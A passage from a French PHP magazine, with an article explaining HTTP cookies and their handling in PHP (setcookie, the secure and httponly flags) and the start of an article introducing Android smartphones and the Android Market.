Le pistage d’un internaute peut être égale-
ment réalisé sur des domaines multiples, en
utilisant un cookie tierce partie. Ce cookie est
placé par un domaine qui n’est pas celui qui
apparaît dans l’URL de navigation de l’inter-
naute. Ceci est rendu possible, par exemple,
par l’intégration de bandeaux ou de fenêtres
publicitaires dans un site web. Lorsque l’in-
ternaute visite un site, le navigateur charge la
page html, et envoie une requête par ressour-
ce à récupérer (image, fichier de style, …). Les
publicités intégrées dans le site sont des res-
sources externes au site, le navigateur contac-
te donc le site de l’annonceur publicitaire,
celui-ci retourne la publicité et peut envoyer Figure 1. Gestionnaire de cookies du navigateur Firefox
à cette occasion un cookie avec un identifiant
unique. Lorsque l’internaute visite d’autres Transmission d’un cookie tir de la racine du serveur web. Une seconde
sites web qui ont le même annonceur publi- Les requêtes HTTP émises par le client (navi- ligne d’en-tête, préfixée par Host, est alors
citaire, il transmet son cookie à l’annonceur gateur), et les réponses HTTP retournées par nécessaire pour indiquer le nom du serveur
quand le navigateur télécharge automatique- le serveur web comportent un en-tête et éven- web. Les deux requêtes suivantes sont iden-
ment la publicité. L’annonceur peut alors tuellement un corps, séparés par une ligne tiques, elles demandent au serveur factice
stocker l’identifiant unique, l’heure de la de- blanche. Les cookies sont toujours transmis monSiteWeb.fr la ressource index.php, par la
mande, le site web depuis lequel l’internaute dans la partie en-tête. Après avoir expliqué méthode GET. La première requête utilise la
a effectué la demande (referrer) et la référence rapidement la structure des requêtes et des version 1.0 du protocole :
de la publicité envoyée. Cette technique per- réponses HTTP, afin de mieux comprendre
met aux sociétés publicitaires d’obtenir des le mécanisme de transmission des cookies, GET http://monSiteWeb.fr/index.php
profils d’utilisateurs afin de cibler les publi- cette partie présente les champs d’en-tête qui HTTP/1.0
cités. Les profils stockés sont quasiment tou- permettent de transmettre un cookie, et les
jours anonymes. Les cookies de pistage tierce options de configuration des cookies. La seconde requête utilise la version 1.1 :
partie sont acceptés par les navigateurs, mais
l’utilisateur peut les bloquer facilement. Afin Requêtes et réponses HTTP GET /index.php HTTP/1.1
de protéger la vie privée des utilisateurs, cer- Lorsque le client demande une ressource au Host:monSiteWeb.fr
tains pays ont mis en place une législation et serveur, il envoie une requête HTTP. L’en-
émis des directives sur l’utilisation des coo- tête contient l’URL de la ressource souhaitée, Lorsque le serveur reçoit une de ces deux
kies (Etats-Unis, Union Européenne). la version du protocole utilisée, la métho- requêtes, il exécute le script PHP index.php
Un inconvénient des cookies est que le de HTTP (GET, POST, …), des informations et retourne la page HTML générée par ce
client est libre d’activer ou de désactiver les optionnelles sur le client (nom et version du script, dans le corps de la réponse. L’en-tête
cookies dans son navigateur. Un site reposant navigateur, jeux de caractères et langues sup- de la réponse du serveur contient des infor-
sur l’envoi de cookies ne fonctionnera pas si portées, …), les éventuels cookies, et des méta- mations sur le corps (type de contenu, taille,
le client n’autorise pas le stockage des cookies informations sur le corps de la requête s’il est encodage, ...), sur le serveur, et peut compor-
sur son disque. L’internaute peut également présent (c’est le cas lors de l’envoi d’un for- ter zéro, un ou plusieurs cookies. La premiè-
effacer des cookies dans son navigateur, sup- mulaire par la méthode POST). La première li- re ligne de la réponse contient la version du
primant ainsi des informations qui peuvent gne de l’en-tête de la requête définit toujours protocole HTTP utilisée par le serveur, un
être utilisées par l’application web, pour gé- la méthode HTTP à appliquer, l’adresse de la code à trois chiffres indiquant le statut de la
rer un panier de commande par exemple. ressource demandée et la version du protoco- réponse et une phrase en anglais expliquant
Malgré ces inconvénients, les cookies sont le HTTP (1.0 ou 1.1). En fonction du choix le code. Par exemple la ligne d’en-tête ci-après
le moyen le plus sûr, et le plus efficace, pour de la version du protocole HTTP, la partie indique que la ressource index.php a été trou-
gérer des paniers de commandes, ou le suivi adresse de la première ligne de l’en-tête dif- vée, et que le serveur qui l’héberge utilise la
d’un utilisateur authentifié dans une appli- fère. Dans la version 1.0, l’adresse correspond version 1.0 du protocole :
cation nécessitant des niveaux de privilèges à l’URL de la ressource. Dans la version 1.1 il
différents. faut indiquer le chemin de la ressource à par- HTTP/1.0 200 OK

30 4/2010

Figure 2. Requête HTTP du navigateur vers le serveur
Figure 3. Envoi du cookie par le serveur
Figure 4. Envoi du cookie par le navigateur
A l’exception de la première ligne, chaque li-
gne d’en-tête de la requête, ou de la réponse
HTTP, comporte un champ HTTP suivi du
caractère deux points et de la valeur associée
au champ. Des champs d’en-tête spécifiques
aux cookies permettent d’envoyer un cookie
du serveur vers le navigateur, et du navigateur
vers le serveur web.
La Figure 2 illustre l’envoi d’une requê-
te par la méthode GET du protocole HTTP
version 1.0, avec un passage de paramètre
au serveur fictif monSiteWeb.fr. Un clic sur
le choix de la langue dans le site web a pro-
voqué l’envoi de cette requête par le naviga-
teur. L’URL contient dans la partie querys-
tring (c’est-à-dire la partie située derrière le
caractère point d’interrogation), une chaîne
de caractères langue=en, celle-ci indique au
script index.php que l’internaute souhaite
visualiser la version anglaise de la page d’ac-
cueil. Le serveur retourne la page en anglais
dans le corps de la réponse HTTP, ainsi
qu’un cookie de langue pour stocker la pré-
férence de langue dans le navigateur (Figu-
re 3). Ce cookie a pour nom langue et pour
valeur en, comme le paramètre qui avait été
envoyé précédemment au serveur. Afin de
simplifier la Figure 3, les informations sur
le type d’encodage, la taille et le type de
contenu du corps ne sont pas montrés dans
l’en-tête de la réponse HTTP. Une fois le
cookie stocké dans le navigateur, celui-ci est
www.phpsolmag.org
renvoyé au serveur à chaque fois qu’une re-
quête est émise vers le serveur monSiteWeb.
fr (Figure 4).
Documents de référence
Les cookies ont été proposés et implémentés
par Netscape vers le milieu des années 90.
Plusieurs documents décrivent la gestion des
cookies pour le protocole HTTP : le docu-
ment d’origine de Netscape, la spécification
RFC2109 de février 1997 (basée en partie
sur le document de Netscape), et la spécifi-
cation RFC2965 d’octobre 2000 qui rend
obsolète la spécification RFC2109. Les ser-
veurs qui supportent les cookies définis par
Netscape et le RFC2109 utilisent le champ
d’en-tête Set-Cookie pour envoyer un coo-
kie au navigateur, les serveurs qui se confor-
ment à la spécification RFC2965 utilisent
le champ d’en-tête Set-Cookie2. Les navi-
gateurs retournent le cookie au serveur web
dans le champ d’en-tête Cookie. Un naviga-
teur qui supporte la spécification RFC2965
l’indique au serveur en envoyant également
un champ Cookie2: $Version="1". L’en-
voi de cookies se conformant à la spécifica-
tion RFC2965 a été testé sous Firefox 3.6.3,
Internet Explorer 8.0, Safari 4.0.4, Google
Chrome 4.1.249 et Opera 10.5.1. Seul le na-
vigateur Opera supporte cette fonctionnali-
té, il supporte également la création de coo-
kies envoyés par Set-Cookie.
Cookies
Cette partie présente le principe des
cookies et les en-têtes HTTP afin que vous
compreniez les concepts sous-jacents à la
manipulation de cookies en PHP et les op-
tions à paramétrer. Lorsque vous manipu-
lerez les cookies avec PHP, vous n’aurez pas
à gérer les champs d’en-tête car des fonc-
tions prédéfinies permettent d’envoyer
les cookies. L’article sera illustré avec le
champ d’en-tête Set-Cookie qui est large-
ment répandu et supporté par la majorité
des serveurs web et des navigateurs. De
même pour simplifier les exemples et figu-
res, la version 1.0 du protocole HTTP sera
utilisée.
Envoi d’un cookie par le serveur
Lorsqu’un serveur souhaite envoyer un coo-
kie à un navigateur, il ajoute une ligne dans
l’en-tête de la réponse HTTP (Figure 3).
Cette ligne comporte le champ d’en-tête
Set-Cookie, suivi du caractère deux-points,
suivi d’une chaîne de caractères contenant
le cookie (paire nom=valeur) et des attributs
optionnels permettant de définir sa validité
(durée, chemin, domaine, connexion sécu-
risée) :
Set-Cookie: nom=valeur; expires=date;
path=chemin; domain=nom_de_domaine;
secure
L’attribut expires fixe la durée de vie du coo-
kie. S’il n’est pas précisé, le cookie est non per-
sistant, il expire quand le navigateur est quit-
té. La date suit le format :
JJ-Mois-AAAA HH:MM:SS GMT
Il faut noter que l’attribut Max-Age peut aussi
être rencontré à la place de expires, si le ser-
veur suit les spécifications RFC, dans ce cas
la valeur attribuée est une durée de vie en se-
condes.
Dans l’exemple de la Figure 3, le nom du
cookie est langue, sa valeur est en, le cookie
est valide jusqu’au 1er janvier 2011. C’est-
à-dire que le navigateur enverra ce cookie
à chaque navigation de l’internaute vers le
site monSiteWeb.fr jusqu’à cette date, ou jus-
qu’à ce que l’internaute le détruise. Jusqu’à
la fin de l’année 2010, l’internaute recevra
automatiquement les versions anglaises des
pages du site. Au 1er janvier 2011, le coo-
kie n’étant plus valide, l’internaute recevra
la version française de la page demandée.
Une fois qu’il aura de nouveau cliqué pour
obtenir la version anglaise du site, un nou-
veau cookie de préférence de langue sera pla-
cé dans son navigateur. Généralement, dans
ce type d’applications, la durée de validité
du cookie est mise à jour à chaque nouvel-
le connexion. Elle est calculée par le script
31
 Pratique
à partir de la date courante. L’internaute
n’est donc pas obligé de redéfinir ses pré-
férences de navigation, sauf s’il a effacé ses
cookies, ou si la date de sa dernière visite est
trop ancienne (la date d’expiration du coo-
kie est dépassée).
Un cookie est valide pour un domaine et
un chemin. Ceci permet de limiter l’envoi
du cookie aux serveurs du domaine, et de
restreindre sa visibilité à des parties de l’ar-
borescence web du serveur. Le nom de do-
maine par défaut est celui du serveur qui
génère le cookie, des noms de sous-domai-
nes peuvent cependant être précisés. Dans
l’exemple de la Figure 3, le nom de domai-
ne pour le cookie n’est pas précisé, le do-
maine est donc celui par défaut. Le chemin
est utilisé pour indiquer le sous-ensemble
d’URL du domaine pour lequel le cookie
est valide et sera envoyé. Le chemin "/" est
le plus général (racine du serveur web), "/
int" enverra le cookie aussi bien aux URL
commençant par "/internet" qu’à celles
commençant par "/intranet". Par défaut,
c’est le chemin du document qui a envoyé
le cookie qui est utilisé. Dans l’exemple de
la Figure 3, le chemin donné est la racine du
serveur, cela signifie que le cookie est valide
pour l’ensemble des pages web situées sur
ce serveur.
L’attribut secure indique au navigateur
qu’il ne doit transmettre le cookie que si
la communication est sécurisée (HTTPS).
Ceci est important lors de la transmission
d’un cookie de session, afin d’éviter l’inter-
ception par un tiers. Par défaut, le cookie
est envoyé quel que soit le type de commu-
nication.
Enregistrement du cookie par le client
Lorsque le navigateur reçoit la réponse HTTP,
s’il supporte les cookies et que la fonctionnali-
té est activée, il analyse le champ Set-Cookie.
Il extrait le nom et la valeur du cookie, ain-
si que ses attributs (durée de vie, chemin,
domaine, ...). Lorsque des attributs sont ab-
sents, le navigateur prend les valeurs définies
par défaut (expiration à la fin de la session, …).
Pour des raisons de sécurité, et pour assurer le
respect de la vie privée, le navigateur doit reje-
ter tout cookie dont le chemin ne correspond
pas à celui de l’URL demandée dans la requê-
te HTTP. Une fois la validité de la demande
vérifiée, le cookie est stocké sur le disque dur
du client.
Les spécifications de Netscape et les
deux versions des RFC précisent qu’un
navigateur doit permettre de stocker au
moins trois cents cookies, dont vingt coo-
kies par serveur ou domaine. La place mé-
moire réservée pour chaque cookie doit
être de 4 Ko minimum (ceci permet de
stocker 4096 caractères ASCII). Quand le
32
quota est dépassé le cookie le moins récent
est écrasé. Une application web doit donc
limiter le nombre et la taille des cookies
envoyés.
Les navigateurs proposent des gestionnai-
res de cookies permettant d’afficher et sup-
primer les cookies stockés sur le disque. La
Figure 1 montre le cookie de langue dans le
gestionnaire de cookies de Firefox. Cet exem-
ple correspond au cookie langue envoyé par
l’exemple de la Figure 3.
Lorsque le cookie envoyé par le serveur
existe déjà dans le navigateur (même nom,
même domaine et même chemin), la nou-
velle valeur remplace la valeur stockée sur
le disque. Si le cookie reçu a une date d’ex-
piration dépassée (attribut expires pour
Netscape ou Max-Age pour les RFC), alors le
cookie qui était stocké sur le disque doit être
effacé par le navigateur. L’envoi d’un cookie
dont la durée de validité est nulle, ou la date
de validité est dépassée, permet aux applica-
tions web de forcer la suppression d’un coo-
kie sur le disque de l’internaute, lorsque ce-
lui-ci se déconnecte. Cette mesure évite que
la session reste valide si le navigateur n’est
pas quitté.
Envoi par le client
A chaque fois que le navigateur envoie une
requête HTTP au serveur, il vérifie si des
cookies sont stockés pour le domaine et le
chemin de la ressource souhaitée. Si ces coo-
kies ne sont pas périmés et qu’ils peuvent
être envoyés en clair, le navigateur ajoute le
champ d’en-tête Cookie dans l’en-tête de la
requête HTTP. Les cookies stockés dans le
navigateur ne peuvent être envoyés qu’au
serveur qui les a créés. Le cookie langue,
dans l’exemple pris dans cet article (Figure
4), a été généré par le serveur fictif monSi-
teWeb.fr, il sera envoyé par le navigateur lors
de chaque connexion vers le serveur. Il ne
sera jamais envoyé à un autre domaine que
celui auquel appartient le serveur fictif qui
l’a créé.
Le champ d’en-tête HTTP comporte un
ou plusieurs cookies sous la forme de pai-
res nom=valeur, séparées par le caractère
point-virgule. Dans l’exemple ci-après, le
navigateur demande la page index.php au
serveur monSiteWeb.fr et envoie les deux
cookies de préférences, le style silver et la
langue en :
GET http://monSiteWeb.fr/index.php
HTTP/1.0
Cookie:style=silver; langue=en
Maintenant que vous connaissez les princi-
pes de base de la communication des cookies
dans le protocole HTTP, vous allez apprendre
à les manipuler depuis un script PHP.
Manipulation de cookies
depuis PHP
Cette partie explique comment envoyer un
cookie depuis un script PHP à un navigateur,
comment lire un cookie renvoyé par le naviga-
teur et comment modifier ou supprimer un
cookie déjà existant.
Envoyer un cookie depuis PHP
La fonction PHP setcookie permet d’en-
voyer un cookie au navigateur. Elle crée
l’en-tête HTTP Set-Cookie à partir des pa-
ramètres qu’elle reçoit, en se basant sur la
spécification des cookies de Netscape. Elle
accepte sept arguments et retourne un boo-
léen (faux en cas d’échec). Le nom et la va-
leur du cookie sont donnés respectivement
en premier et second argument. Les argu-
ments suivants fixent la durée de validité, le
chemin et le domaine du cookie. Les deux
derniers arguments sont des booléens dédiés
à la sécurité :
setcookie("nom", "valeur", expiration,
"chemin", "domaine", secure, httponly);
La date d’expiration doit être donnée sous
la forme d’un timestamp Unix. C’est-à-dire
que c’est un nombre entier représentant
le nombre de secondes écoulées depuis le
1er janvier 1970, jusqu’à la date d’expi-
ration souhaitée. Pour stocker un cookie
qui restera valide une heure il suffit donc
de passer en argument time()+3600. Pour
obtenir un cookie de session, supprimé
lorsque le navigateur est quitté, il suffit
de passer la valeur 0. Le code ci-après crée
un cookie langue persistant qui est valide
une semaine (7 jours x 24 heures x 3600
secondes) :
setcookie("langue", "en", time()+604800);
Si le script est exécuté le samedi 24 avril 2010
à 20h en France, le cookie sera valide jusqu’au
samedi 1er mai 2010, 18h GMT. La fonction
setcookie génère la ligne d’en-tête HTTP
correspondante :
Set-Cookie:langue=en; expires=Sat,
1-May-2010 18:00:03 GMT
Pour restreindre le vol des cookies de ses-
sion, il est conseillé d’une part d’interdi-
re l’envoi de cookie par le navigateur si la
connexion n’est pas cryptée (vol par inter-
ception), et d’autre part d’interdire la ma-
nipulation des cookies par les langages de
script dans le navigateur (vol par une atta-
que XSS). Ceci est réalisé en donnant la va-
leur true aux deux derniers paramètres de
la fonction. Le dernier argument n’est pré-
sent que depuis la version 5.2 de PHP. Il a
4/2010
 Cookies

style = silver
Sur Internet langue = en

• http://php.net/manual/fr/features.cookies.php – Manuel des cookies sur le site officiel de Modifier la valeur d’un cookie
PHP, Pour modifier la valeur d’un cookie stocké
• http://curl.haxx.se/rfc/cookie_spec.html – Spécification d’origine des cookies de Netscape sur le disque du client, il suffit d’en envoyer
(une copie du document est disponible sur le site officiel de CURL), un de même nom, de même chemin et de
• http://www.rfc-editor.org/rfc/rfc2109.txt – RFC 2109 HTTP State Management Mechanism même domaine, avec la nouvelle valeur. Par
(décrit les en-têtes HTTP de transmission de cookies Set-Cookie et Cookie), exemple, le code ci-après remplace la valeur
• ftp://ftp.rfc-editor.org/in-notes/rfc2965.txt – RFC 2965 (décrit les en-têtes HTTP Set-Coo- du cookie style, par la valeur green :
kie2, Cookie2 et Cookie, en remplacement du RFC2109).
setcookie('style', 'green');

pour effet d’ajouter le paramètre HTTPOnly
dans la ligne Set-Cookie. Ce dernier n’étant
pas standard il n’est pas implémenté dans
tous les navigateurs.
Seul le premier argument de la fonction
est obligatoire (nom du cookie). Par défaut
le cookie est non persistant, les booléens de
sécurité ont la valeur false, le chemin est ce-
lui du répertoire du script qui est exécuté, le
domaine est celui du serveur. Si vous ne sou-
haitez pas définir de valeur pour un des ar-
guments de type chaîne de caractères, il suf-
fit de lui affecter une chaîne vide. Le code
ci-après crée un cookie de session non per-
sistant, qui ne sera transmis que par HTTPS
et dont la manipulation en JavaScript sera
interdite dans les navigateurs reconnaissant
l’attribut httponly :
setcookie("sessid", "f7db4156ea79df",
0, ", ", true, true);
La fonction génère l’en-tête HTTP suivant :
Set-Cookie: sessid=f7db4156ea79df;
secure; httponly
Les cookies étant envoyés dans l’en-tête
HTTP, la fonction doit toujours être appe-
lée avant d’écrire le corps (c’est-à-dire avant
toute instruction echo, print, printf ou
toute balise HTML). Une fois le début du
corps envoyé il est impossible de placer un
cookie, PHP affichera dans ce cas un messa-
ge d’alerte :
Warning: Cannot modify header information -
headers already sent.
Récupérer un cookie envoyé
par le client
Les cookies envoyés par le navigateur sont
stockés par PHP dans le tableau associatif su-
per-global $_COOKIE. Les clés de ce tableau
sont les noms des cookies, les valeurs sont
celles associées à chaque cookie. Par exem-
ple, le code suivant affiche la valeur du coo-
kie langue :
echo $_COOKIE['langue'];
Le script test.php ci-après, situé dans le réper-
toire visite du site web fictif monSiteWeb.fr
envoie deux cookies au client lorsque celui-ci
demande l’URL http://monSiteWeb.fr/visite/
test.php :
<?php // test.php
setcookie("langue", "en", time()+604800,
'/');
setcookie("style", "silver", 0);
?>
Le premier cookie est une préférence de lan-
gue persistante, il sera valide pendant une se-
maine. Ce cookie sera transmis à chaque fois
que le navigateur enverra des requêtes au site
monSiteWeb.fr, car la validité est sur la racine
du site web (symbole slash). Le second coo-
kie est une préférence de style non persistan-
te. Comme le chemin n’est pas précisé, c’est
celui du script qui a placé le cookie qui sera
utilisé, c’est-à-dire /visite/. Le cookie sera
donc envoyé uniquement aux scripts situés
dans le même répertoire que le script test.php
ou dans un des sous-répertoires.
Le script affiche_cookies.php affiche tous
les cookies contenus dans le tableau $_
COOKIE :
<?php // affiche_cookies.php
foreach ($_COOKIE as $nom=>$valeur){
echo "$nom = $valeur<br>";
} tion, et comment les sécuriser.
?>
Si le script affiche_cookies.php est placé à
la racine du site web, lorsque le navigateur
envoie une requête pour obtenir la ressour-
ce http://monSiteWeb.fr/affiche_cookies.php,
seul le cookie de langue est envoyé car il est
valide pour tout le site web. Le script affiche
donc :
langue = en
Si le script affiche_cookies.php est placé dans
le répertoire visite, lorsque le navigateur en-
voie la requête pour obtenir la ressource
http://monSiteWeb.fr/visite/affiche_cookies.
php, les deux cookies sont envoyés :
Effacer un cookie
Pour effacer un cookie stocké par le client, il
suffit d’en renvoyer un de même nom, de mê-
me chemin et de même domaine, dont la date
d’expiration est inférieure à la date courante.
Par exemple, si la fonction setcookie reçoit
comme troisième argument time()-3600, le
cookie envoyé au client a une date d’expira-
tion située une heure dans le passé. L’instruc-
tion ci-après indique qu’il faut effacer le coo-
kie dont le nom est sessid :
setcookie('sessid', ", time()-3600);
Conclusion
Vous savez à présent placer un ou plusieurs
cookies dans le navigateur d’un internaute,
et récupérer les valeurs des cookies dans un
script PHP. Ces connaissances vous permet-
tent d’ores et déjà de stocker des préférences
utilisateur afin de personnaliser l’affichage
(style, langue, ...).
Les cookies combinés aux sessions permet-
tent de réaliser des paniers de commandes,
ou de gérer une navigation dans un site né-
cessitant une authentification et comportant
plusieurs niveaux de privilèges (wiki, CMS,
forum, ...). Dans les prochains numéros de
PHP Solutions, vous apprendrez le principe
et la manipulation des sessions, vous verrez
quels sont les problèmes de sécurité les plus
courants rencontrés dans ce type d’applica-
CÉCILE ODERO,
MAGALI CONTENSIN
Cécile Odero est spécialisée dans la conception
et le développement d’applications web en PHP.
Elle est développeur web freelance.
Contact : [email protected]
Magali Contensin, auteur du livre Bases de don-
nées et Internet avec PHP et MySQL, est chef de
projet en développement d’applications au CNRS.
Elle enseigne depuis plus de dix ans le développe-
ment d’applications web à l’Université.
Contact : http://magali.contensin.online.fr

www.phpsolmag.org 33
 Pratique
Android
ou gPhone
Vous voulez changer de téléphone en pensant
à un smartphone ? Oui mais lequel ? Vous avez entendu
parler d'Android, de gPhone et vous aimeriez creuser
le sujet puisque vous connaissez déjà plus ou moins
d'autres noms. Penchons nous donc sur Android.
Cet article explique :
• Ce qu'est Android.
• Comment gérer au mieux son téléphone
Android.
Niveau de difficulté
S
i vous vous penchez sur les smart-
phones (ou ordiphone), vous aurez
le choix entre plusieurs modèles. Par
modèle entendez plutôt système d’exploi-
tation que marque de fabricant. Car c’est le
système d’exploitation qui, comme pour les
ordinateurs traditionnels, permettent à ces
téléphones intelligents, outre la téléphonie
évidemment, de gérer agendas et calendriers,
d’aller naviguer sur internet, de consulter ses
courriels, de faire de la messagerie instanta-
née, etc.. Plusieurs systèmes d’exploitation
pour smartphones sont disponibles de nos
Figure 1. Logo officiel avec sa mascotte
34
• le fait que la communauté Android soit
Ce qu’il faut savoir : en retard par rapport aux communautés
• Ce qu'on espère d'un smartphone. Linux parce que les deux projets Linux
et Android sont développés de manière
totalement séparée.
Du fait de la non présence de Glibc dans
Android, une application compilée pour
jours : Symbian, Windows Mobile, Black- GNU/Linux ne sera pas exploitable. Il
berry, iPhone OS, Palm webOS, Android, faudra recompiler avec la bibliothèque
etc.. Si iPhone OS et Windows Mobile sont C Droid. De toute façon, il faut également
peut-être les plus connus, Android, bien que compter avec la taille plus réduite des écrans
bien plus jeune, connaît un bel essor. Inté- des smartphones et réadapter fort vraisem-
ressons-nous donc à Android pour des rai- blablement l’application graphique en
sons que nous allons vite découvrir. conséquence mais c’est une autre histoire.
Présentation d’Android
Initialement, c’est la startup Android qui a
développé ce système d’exploitation. Le choix
du terme Android est basé sur le mot androï-
de représentant un robot construit sur le mo-
dèle humain. En août 2005, la société Google
a racheté la startup Android. Les rumeurs qui
ont suivicette acquisition ont transformé le
terme Android en gPhone. De fait, Android
est le nom réel du système d’exploitation pour
smartphone tandis que gPhone en est devenu
le surnom désormais courant des téléphones
Android, qu’on nomme aussi Androphone.
Origine
Android est basé sur le noyau Linux. C’est
un système ouvert et Open Source. Cepen-
dant, d’après Matthew Porter, architecte logi-
ciel en chef chez la société Embedded Alley,
ce n’est pas un système Linux dans le sens
strict du terme. Sans s’appesantir sur les dé-
tails techniques, Matthew Porter dénonce :
• l'absence de certains composants de
Linux, rendant ainsi Android inaccessi-
ble et très rigide (exit la librairie C Glibc
par exemple), Figure 2. Le HTC Heros
4/2010

D’autre part, l’arborescence des fichiers
du système Android n’est pas la même que
pour GNU/Linux.
Android est sous licence Apache ver-
sion 2. Le kit de développement (SDK) est
disponible gratuitement sur le site officiel
http://developer.android.com pour les systè-
mes d’exploitation Windows, Mac OS X
(Intel) et GNU/Linux (i386). Vous vous re-
porterez sur la rubrique Developer’s Guide
(Dev Guide) si vous désirez développer (an-
glophobes s’abstenir). De fait, Android n’est
pas isolé puisque l’Open Handset Alliance
regroupe, outre Android, des constructeurs
et des opérateurs de téléphonie.
Caractéristiques
Comme tout système d’exploitation, An-
droid met à disposition bureau et applica-
tions. Les applications sont développées en
Java mais le langage XML est utilisé pour
décrire toutes les ressources externes (inter-
faces, contenus en textes et images) dans un
souci de simplicité et de lisibilité. Du point
de vue des développeurs, il faut utiliser le
kit de développement (SDK) disponible sur
le site officiel, le kit étant une machine vir-
tuelle Java optimisée (et nommée Dalvik)
comportant un sous ensemble de librairies.
On ne développe donc pas avec Java Mobile
Edition (J2ME).
D’autre part, il existe plusieurs versions
d’Android, la dernière étant la 2.1 Eclair (les
anciennes utilisées dans les gPhone étant
la 1.5 Cupcake sortie en avril 2009, la 1.6
Donut de décembre 2009 et la 2.0 Eclair
d’octobre 2009). Le mauvais aspect de ces
diverses versions est que certaines applica-
tions ne sont pas forcément compatibles sur
tous les systèmes Android. Impossible alors
d’utiliser telle application qui requiert An-
droid Eclair (2.0 ou 2.1) alors que l’Andro-
phone n’utilise que Android Donut (1.6).
Mettre à jour Android vers la dernière ver-
sion ? Pas tant de hâte ! En tout cas, il vaut
mieux se renseigner préalablement sur le si-
te du constructeur et les forums. La mise à
jour doit être proposée par le constructeur
de l’appareil. Cependant, le constructeur du
gPhone peut ne pas proposer de mise à jour
(préférant privilégier un autre modèle de té-
léphone Android) ou prendre trop de temps
à votre goût pour fournir cette mise à jour.
Sachez que c’est pourquoi il peut exister des
mises à jour non officielles que vous trouve-
rez sur les sites dédiés au système Android.
Toutefois, outre le fait que ces mises à jour
de systèmes ne sont valables que pour un
modèle précis d’Androphone, vous le ferez
à vos risques et périls ! D’où la recomman-
dation à bien lire avant toute manipulation
la notice d’emploi de la mise à jour officieu-
se du système mais aussi les retours d’expé-
www.phpsolmag.org
Android
Quelques choix d’applications glanées sur le Market
Liste non exhaustive d’applications fonctionnelles (sur mon Motorola Dext) :
Internet
• Opera mini : gratuit : le navigateur Opera pour Android.
• Dolphin Browser : gratuit : navigateur internet bien plus abouti que le navigateur d'origi-
ne.
• Meebo IM : gratuit : pour la messagerie instantanée.
Multimédia
• JamendoPlayer : gratuit : pour accéder au catalogue musical Jamendo.
• Meridian Player : gratuit : excellent lecteur audio / vidéo.
• Music folder : gratuit : Lecteur MP3 avec explorateur de fichiers.
• aRecorder : gratuit : enregistrer le flux audio.
Personnalisation
• Ringdroid : gratuit : pour créer et éditer ses propres sonneries.
• Ringtones : gratuit : un choix de plus de 200000 sonneries MP3.
• PandaHome : gratuit : pour changer totalement de présentation de bureaux.
Graphisme
• PicSay Pro : 1,99 $US : puissant logiciel de retouche photo.
• Camera More : 0,99 $US : offre de nombreuses fonctions supplémentaires à l'appareil
photo.
Utilitaires
• Astrid : gratuit : gestionnaire de tâches (mieux que celui d'origine).
• Calculatrice scientifique : gratuit : une calculatrice améliorée (par rapport à celle d'origi-
ne).
• Note Me : gratuit : pour noter rapidement.
• La conjugaison : gratuit : si vous ne savez pas comment conjuguer.
• Dictionnaire Littré : gratuit : pour les amoureux de la langue de Molières.
• KeePassDroid : gratuit : gestionnaire de mot de passe.
Gestionnaire de fichiers
• AndExplorer : gratuit : gestionnaire de fichier en français.
• DiskUsage : gratuit : gestionnaire de carte SD par graphique d'occupation.
• SD Card Memory Widget : gratuit : montre l'utilisation de la carte SD.
• AppsInstaller : gratuit : pour installer les applications sur la carte SD.
Divers
• 3D Compass : gratuit : une boussole électronique en 3D.
• Analog Compass : gratuit : une autre boussole électronique en 2D.
• Lumiere : gratuit : transformer le gPhone en lampe de poche.
Jeux
• Labyrinth Lite : gratuit : faire passer une boule dans un labyrinthe en évitant des trous.
riences de ces mises à jour, commentaires peint), à vous de sélectionner une image de
à trouver sur les forums. fond de taille correcte et respectable pour
Comme les iPhone, les Androphones sont ne pas vous retrouver avec des bords extrê-
munis d’un écran tactile. Cliquer sur un mes tout noir.
bouton, une icône ou un lien revient donc Android permet de placer sur le bureau
à appuyer dessus. des raccourcis vers des applications et des
dossiers de la micro carte SD mais aussi
Le bureau Android des widgets. Les widgets permettent d’affi-
Initialement, Android fournit un bureau cher sur le bureau des informations rapi-
étendu sur trois parties d’écran. Selon les dement visibles et exploitables. La barre du
constructeurs, on peut dépasser cette limi- haut rassemble diverses informations : les
te de nombre de bureaux (5 sur un Moto- réseaux utilisés, le niveau de la batterie, les
rola Dext) mais on peut également étendre notifications (arrivée de courriel, de SMS,
le nombre de bureaux via des applications d’appel, etc.), l’heure, l’avancée de téléchar-
tierces (PandaHome et Open Home permet- gement, etc..
tent jusqu’à 7 bureaux.). Si vous changez En bas de l’écran et en son milieu, se trou-
de partie de bureau, vous constaterez que ve une sorte de languette grise comportant
le fond d’écran bouge également dans le une flèche dirigée vers le haut. Cette lan-
même sens. Pour ce fond d’écran (papier guette donne accès aux diverses applications
35
 Pratique
Figure 3. Le Motorola Dext (Cliq) avec le clavier ouvert
Figure 4. Le Motorola Milestone
en cliquant dessus. Vous obtenez alors la liste
des applications classées alphabétiquement.
Il suffit de faire glisser cette liste dans un
sens ou dans l’autre pour en voir les parties
cachées puis de cliquer sur l’icône de l’appli-
cation désirée. Si la liste des applications est
affichée, la languette grise se situe désormais
sur le haut de l’écran avec sa flèche dirigée
vers le bas. Vous aurez donc compris qu’il
suffit de cliquer sur cette languette une nou-
velle fois pour replier la liste.
36
Applications natives
Par nature et destination, Android a été dé-
veloppé pour intégrer au maximum les ap-
plications de Google (Google Maps, Google
Talk, Google Calendar, Gmail, YouTube,
et récemment Google Earth), du moins de-
puis le rachat par Google. De plus, une bous-
sole électronique est intégrée (fonction in-
dispensable pour Google Maps) ainsi qu’un
accéléromètre. Diverses autres applications
se trouvent nativement sur les téléphones
Android : calculatrice, appareil photo, ca-
méscope, gestion des contacts, visualiseur
de galerie d’images et de vidéos, navigateur
internet … La liste d’applications installées
nativement dépend en fait de l’Androphone
(marque et modèle).
Android Market
Si l’une des applications natives ne vous
convient guère ou si vous estimez que l’un
de vos besoins applicatifs n’est pas four-
ni, vous pouvez toujours vous diriger vers
l’Android Market. Cette plate-forme met
à disposition une liste déjà fort impression-
nante d’applications pour Android (entre
16000 et 20000 dont 37,8% payantes, de-
puis décembre 2009) . Passez par le widget
nommé Market (une icône représentant un
sac blanc avec le logo vert Android) pour vi-
siter Android Market. Chaque application
est dotée de sa propre fiche descriptive avec
une notation de popularité, des commen-
taires et un bouton Installer. Je vous invite
fortement à cliquer sur le lien Lire tous les
commentaires. Une fois votre choix effectué,
le système vous indique les permissions
systèmes requises (internet, GPS …) ; vous
pouvez encore annuler le téléchargement
si ces permissions vous paraissent exagé-
